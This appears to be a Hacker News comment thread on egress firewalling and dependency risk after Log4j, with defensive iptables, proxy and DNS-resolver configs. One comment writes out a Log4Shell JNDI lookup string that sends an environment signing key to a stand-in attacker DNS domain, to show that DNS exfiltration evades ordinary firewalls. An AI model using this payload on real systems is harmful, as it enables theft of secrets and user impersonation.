There’s a ton of stuff on HN which is just ads for SaaS companies; at least this is new and different. It might also be something many are interested in, in light of the Log4j exploit. It would have helped me a great deal.
With everyone using un-curated package managers such as NPM and PyPI there is also the chance of a package being compromised. At least if we had outbound firewalls it could help mitigate these problems.
It seems to me that there is an incredible opportunity for someone with the right background to build this (I wish it were me). I tend to use PaaSes like Heroku for my apps and would love it if this was built in! They even know (most of) what other infrastructure my apps talk to. Why is it not part of Docker?
(Obviously everyone should already be using inbound WAF such as CloudFlare)
Machines in the legacy data center didn’t have internet access, and so they didn’t want cloud machines to have it either.
But once we locked down the network so many things broke. Not just user level stuff like doing code builds in maven, but also machine level stuff like enabling drive encryption.
Preventing out-of-band exfiltration of data and downloading of exploit materials is very important to a defence-in-depth approach, and none of the clouds seem to embrace it.
The problem was that all Azure services were provided on public IP ranges, so given that VM services needed to communicate with Azure agent endpoints we couldn’t block on IP, and had to implement it via HTTP proxies.
Using explicit HTTP proxies was a config nightmare, as not everything honoured the HTTPS_PROXY env var (e.g. Java). And using an implicit proxy was a nightmare of MITM, custom certs, and updating a myriad of trust roots, and then the proxy would use a ‘captive portal’ and cause broken redirects.
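For reference, the JVM ignores HTTPS_PROXY and uses its own system properties instead. A minimal sketch of pointing a Java app at an explicit proxy (the proxy host, port, and jar name here are placeholders, not from the original setup):

```shell
# Java does not read the HTTPS_PROXY env var; it has its own system
# properties for proxying. proxy.internal:3128 is a placeholder.
java -Dhttp.proxyHost=proxy.internal -Dhttp.proxyPort=3128 \
     -Dhttps.proxyHost=proxy.internal -Dhttps.proxyPort=3128 \
     -Dhttp.nonProxyHosts="localhost|*.internal" \
     -jar app.jar
```

This is exactly the kind of per-runtime special-casing that makes explicit proxies a config burden: every language and tool has its own knobs.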
Little Snitch as an example of UX in this area is perfect as you can run it for a while first to see what is connecting to what, then start looking down everything else.
However, you’d still show up as vulnerable here, because even with proper egress filters many systems will by default resolve DNS out to the internet. Some people fix this too, by running restricted local DNS servers at another privilege level. But if DNS is your only way out, the worst impact I’ve seen so far is info disclosure; I have not seen RCE possible with this bug when a normal firewall is set up. But hackers are creative, so I am keeping an eye out.
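A sketch of closing that gap at the host level: force all DNS through an internal resolver and drop direct lookups to the internet. The resolver address 10.0.0.2 is an assumption for illustration, and these rules would need to fit into whatever egress policy already exists:

```shell
# Allow DNS only to the internal resolver (placeholder 10.0.0.2),
# then drop any direct DNS to the internet. Run as root.
iptables -A OUTPUT -p udp --dport 53 -d 10.0.0.2 -j ACCEPT
iptables -A OUTPUT -p tcp --dport 53 -d 10.0.0.2 -j ACCEPT
iptables -A OUTPUT -p udp --dport 53 -j DROP
iptables -A OUTPUT -p tcp --dport 53 -j DROP
```

The resolver itself then needs its own outbound policy, otherwise you've just moved the exfiltration path one hop over.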
Some places do. The systems I deal with definitely do, and it’s common in banking and card payment systems (PCI DSS has strict firewall requirements). Even on our non-payment systems we still restrict outbound access.
I think it comes down more to what focus your organisation has, especially how large a part security plays in it.
This is also why I hate third party APIs that can’t be firewalled by IP/subnet but only by domain. Especially those operating behind a cloud load balancer like AWS ELB, because they are extremely/impossibly difficult to firewall without introducing risk of permitting access to other services also using the load balancer. Dealing with HTTP/HTTPS proxies is a pain and introduces yet another attack vector.
Not really, but it's important to keep in mind that these kinds of things are less effective than you might imagine. E.g. using the system resolver wouldn't be covered by a firewall in most configurations, so this doesn't help you for an exploit like ${jndi:ldap://${env:AUTH_COOKIE_SIGNING_KEY}.attackercontrolleddns.com} followed by impersonating any user.
Even if you correctly lock down the application server networks and nodes, I'd be surprised to find a restricted DNS resolver in place. It's a good idea for sure, but I'd expect it to be very rarely done. Not least because "exfiltrate data over DNS" is probably not a well-known vector.
> (Obviously everyone should already be using inbound WAF such as CloudFlare)
How is this obvious? This is not a trivial matter.
By using a WAF you are explicitly blocking many standard hacking attempts such as SQLi. At least it seems obvious to me to take the precaution of having one; you can never trust that your code or the libraries you use don’t have security holes.
By using a hosted or managed WAF, when a new vulnerability is found (such as Log4Shell) the service updates the rules and you have a level of mitigation before even patching your system, or even being aware of it.
The solution we ended up implementing was to run the scraper through a local HTTP proxy, block all other connections, then use the proxy's config to whitelist the site by the Host header. This, of course, meant doing SSL stripping on the proxy, which was only acceptable because the proxy was ours. If a hosting provider suggested something like this we'd laugh them away.
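A minimal sketch of that whitelist idea using Squid (the site name is a placeholder, and the SSL-bump/stripping setup is omitted since it depends heavily on the deployment):

```shell
# Minimal squid.conf sketch: permit one destination domain, deny all else.
# target-site.example stands in for the scraped site.
cat > squid.conf <<'EOF'
http_port 3128
acl allowed_sites dstdomain target-site.example
http_access allow allowed_sites
http_access deny all
EOF
```

Combined with host firewall rules that block everything except the proxy port, the scraper can only ever reach the one whitelisted site.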
My current company is using Cilium (and CNPs) within Kubernetes to solve for this, although it does have some issues. Calico has FQDN filtering in its "Pro" versions.
For covering a whole VPC you can look at AWS's Route 53 DNS Resolver Firewall (which sort of addresses the same class of concerns). There are gateways that will address this at a VPC level too (probably the best solution), like Aviatrix or Chaser Systems' "discriminNAT".
The point is that there are solutions for this; it's just that the UX around managing them could be a lot better, and at the current price point it isn't worth it for the vast majority of projects.
https://expeditedsecurity.com/heroku/how-to-block-log4j-vuln...
Black-hole routing is often used in more regulated industries (e.g. finance):
* https://en.wikipedia.org/wiki/Black_hole_(networking)
There's overhead in setting up proxies and telling all software to use them (browsers can be somewhat automated with proxy auto-config (PAC) files). You could of course just use this technique on your server infrastructure.
But it's a 'non-standard' configuration in a world where everything assumes universal connectivity to everything else.
One interesting idea I've seen mentioned is running a firewall on the system itself on a per-UID basis:
* https://www.cyberciti.biz/tips/block-outgoing-network-access...
So if you have a "www-data" UID that runs the web server, you set up iptables to allow it to answer incoming connections and produce replies, but not generate new connections.
> A web server mostly accepts connections but usually only needs to initiate very few connections itself. Therefore it makes sense to limit the possible outgoing connections to what is actually needed. This makes it much more difficult for an attacker to do harm once he has exploited some web application.
* https://wiki.debian.org/Apache/Hardening#Restrict_outgoing_c...
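Following the Debian wiki's approach, the per-UID rule pair might look like this (the UID and the choice of REJECT over DROP are illustrative):

```shell
# Let the www-data user reply on established connections, but block
# any NEW outbound connection it tries to initiate. Run as root.
# The owner match only works in the OUTPUT chain.
iptables -A OUTPUT -m owner --uid-owner www-data \
         -m state --state ESTABLISHED,RELATED -j ACCEPT
iptables -A OUTPUT -m owner --uid-owner www-data -j REJECT
```

Incoming requests still work because the replies belong to connections the client established; only connections originated by the web server's UID are refused.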
So if you are compromised with attack code, one of the first things it tends to do is fetch some more advanced code to start rummaging through your system(s): that fetch is potentially blocked because it's a new connection to the malware hosting server (or the C&C server).
But for a server app (which you built and manage) where you are only talking to known endpoints everything else should be blocked, but we don’t do it. We all use platforms for our apps where anything we use could be compromised and connect to the outside world!
And of course, in this case it only takes one app using this library that has a legitimate use case for unlimited access. Unless you find a way to limit libraries separately.
It’s also an inviting problem to solve, since it shouldn’t be a lot of work: it should be easy to stop your systems from making outbound connections.
The issue is that many have come to expect NAT or public IPs as the default on their cloud infrastructure, and firewalls would result in too many support cases.
As a C developer, I disagree with the assertion that Java is a mature language. It's only 26 years old! (And in a practical sense even younger than that, since it has changed a lot since the early versions.)
js/npm really deserves it. I lost many hours last week because of the shitty philosophy of splitting things not into libraries but mainly into single functions, and on top of that packages with incorrect package.json files, packages that depend on git repositories, or cases where package X is bugged on Node version Y, so you should upgrade Node, but if I upgrade Node then package W is now incompatible. (I inherited this project, so it's not my fault it uses outdated stuff that's no longer cool.)
With this Java log library, it seems it does logging and you don't also need a leftpad and an isOdd to have it working, or some other library that just defines colors, or another that changes the output from plain text to CSV, etc.
IMO using 1 lib for logging, 1 for unit tests, 1 for db access, 1 for HTTP, and 1 for GUI makes sense; what is stupid is if these 5 libraries combined depend on 100+ libraries. We need to push back against this, since the npm philosophy and CV-driven development are spreading.
[1] https://github.com/airsonic-advanced/airsonic-advanced/issue...
If we’re feeling particularly lazy we might even just do mvn dependency:tree
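For example, the lazy check for the vulnerable artifact could be narrowed with the plugin's include filter (the coordinates below are the real log4j-core ones; whether your build pulls it in transitively is the whole point of the check):

```shell
# Print the resolved dependency tree, filtered to log4j-core, which
# surfaces transitive pulls the POM never names directly.
mvn dependency:tree -Dincludes=org.apache.logging.log4j:log4j-core
```

This still only tells you what Maven resolves, not what ends up on a runtime classpath assembled some other way.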
Note that non-affected JVMs are still vulnerable to other issues triggered by that resolution process, just not as bad as loading untrusted remote objects. So you should upgrade log4j2 even if you use a non-vulnerable JVM.
If your app depends on compiled libraries, then the build-time options used to construct the library are as important as version and checksum information.
I see this a lot on HN and the links here - lots of developers for whom a "dependency" is literally a file of non-compiled code, and thus not subject to changes in behavior unless edited. This is not true for compiled languages (and, for all I know, might not even be true for some non-compiled languages).